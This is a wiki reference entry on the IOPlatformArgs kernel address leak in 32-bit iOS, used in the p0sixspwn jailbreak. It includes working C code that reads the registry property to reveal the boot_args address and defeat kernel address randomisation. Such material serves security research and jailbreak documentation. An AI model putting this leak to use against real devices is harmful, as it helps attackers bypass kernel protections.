IOPlatformArgs leak

From The Apple Wiki

The IOPlatformArgs vulnerability leaks kernel virtual addresses through the IOPlatformArgs property of the IOPlatformExpertDevice registry entry, which any unprivileged process can read: the property contains the kernel address of the boot_args structure, from which the kernel base address follows. It was used in p0sixspwn.

#include <stdint.h>
#include <stdlib.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>

/* Layout of the 16-byte IOPlatformArgs property as exposed on 32-bit iOS. */
typedef struct {
  uint32_t deviceTreeP;  /* kernel virtual address of the device tree */
  uint32_t bootArgs;     /* kernel virtual address of the boot_args structure */
  uint32_t zero;
  uint32_t zero_1;
} platformArgs;

static uint32_t
get_kernel_base_boot_args(void)
{
  CFStringRef parameter = CFSTR("IOPlatformArgs");
  CFDataRef data = NULL;
  platformArgs IOPlatformArgs = {0};

  /* Look up the platform expert and read its IOPlatformArgs property. */
  io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault,
                                                            IOServiceMatching("IOPlatformExpertDevice"));
  if (platformExpert)
  {
    data = IORegistryEntryCreateCFProperty(platformExpert,
                                           parameter,
                                           kCFAllocatorDefault, 0);
    IOObjectRelease(platformExpert);
  }

  /* Property absent, unreadable, or not a CFData: nothing is leaked. */
  if (data == NULL || CFGetTypeID(data) != CFDataGetTypeID())
  {
    if (data) CFRelease(data);
    return 0;
  }

  CFIndex bufferLength = CFDataGetLength(data);
  if (bufferLength >= (CFIndex)sizeof(IOPlatformArgs))
  {
    /* Copy the leading 16 bytes straight into the struct; no heap buffer needed. */
    CFDataGetBytes(data, CFRangeMake(0, sizeof(IOPlatformArgs)), (UInt8 *)&IOPlatformArgs);
  }
  CFRelease(data);
  return IOPlatformArgs.bootArgs;
}

Once the attacker knows the virtual base, they can use the virt_to_phys macro to compute the physical base; in this way both bases are leaked. All of this relies on the IOPlatformArgs bug.